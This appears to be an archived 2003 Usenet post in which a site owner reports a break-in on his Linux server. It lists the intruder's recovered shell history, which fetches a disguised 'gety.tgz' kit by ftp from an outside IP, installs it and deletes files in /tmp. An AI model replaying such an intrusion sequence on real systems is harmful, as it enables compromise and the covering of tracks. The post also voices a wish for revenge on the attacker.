Big Website Hack Documented

From: Colnel Panic (yeah@boy.com)
Date: 03/25/03

• Next message: athegates: "Re: Attacking the loopback interface from the network"
• Previous message: Coyote: "Re: VNC Help"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Colnel Panic <yeah@boy.com>
Date: Tue, 25 Mar 2003 00:55:01 GMT

chuckwest.org

One of the many hack attempts at this machine actually worked. This was
not a zombie virus floating around the net. This was, so it appears, an
evil person sitting at a machine somewhere obviously craking this site.
That's the bad news. The good news is it was back up in less than 30
minutes. I'll have to restore the data but I put the server back up to
piss someone off. I will be on the net whether you like it or not. The
games are fun however and I would miss them if they where gone.

How The Event Unfolded:

It started when I noticed my search engine was not functioning. I
swithed to a virtual console (tty1) and pressed the up arrow to look for
a command I typed earlier. There I found 11 or 12 commands that I did
not type. They are:

linuxconf - I may have typed this one. The following I am sure I did not
type.

export TERM='dumb'

reset

id

ftp 209.171.43.28

tar xvfz gety.tgz - (That's gety.tgz not getty.tgz)

cd gety

./install

cd /tmp

rm -rf km3

exit

Before the machine fell apart in my hands I was able to recover the
/var/log directory and publish it at chuckwest.org/log for anyone who
might care to look at it.

As of now I am dedicated to find who would do this. This is a rare case
because, by luck, I was able to document the incident in great detail.
I'd like to find out just exactly who my "enemy" is and make thier life
a living hell. Just for fun of course.

-Chuck

• Next message: athegates: "Re: Attacking the loopback interface from the network"
• Previous message: Coyote: "Re: VNC Help"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Big Website Hack Documented ... not a zombie virus floating around the net. ... That's the bad news. ... a command I typed earlier. ... Just for fun of course. ... (comp.security.unix) Re: Practical jokes for mainframe systems programmers ... then walk over and proceed to logon as normal. ... "command prompt" of the interactive system we used. ... people's reactions, while FUN was running, was FUN! ... send email to listserv@xxxxxxxxxxx with the message: GET IBM-MAIN INFO ... (bit.listserv.ibm-main) Re: Primary Differences: FreeBSD/Linux ... >> I've been reading the Handbook and run across some vaquely troubling things. ... >> shell for scripts, ... Good news there. ... > ports tree or package tools from a console command line. ... (comp.unix.bsd.freebsd.misc) Re: ide-cd problem ... The good news is that the acpi problem was the cause of the startup issues. ... the command before seems to have an expectation of a 2048 transfer ... I have got myself a copy of the ATA/ATAPI spec (document T13/1410D revision ... To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ ... (Linux-Kernel) Re: "Stumpy" lives - much to the chagrin of the trolling trash... ... Considering the "fun" I've been having at work and at home, ... needed a little good news. ... Biggest problem was the bathroom, as the door ... (sci.space.history)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint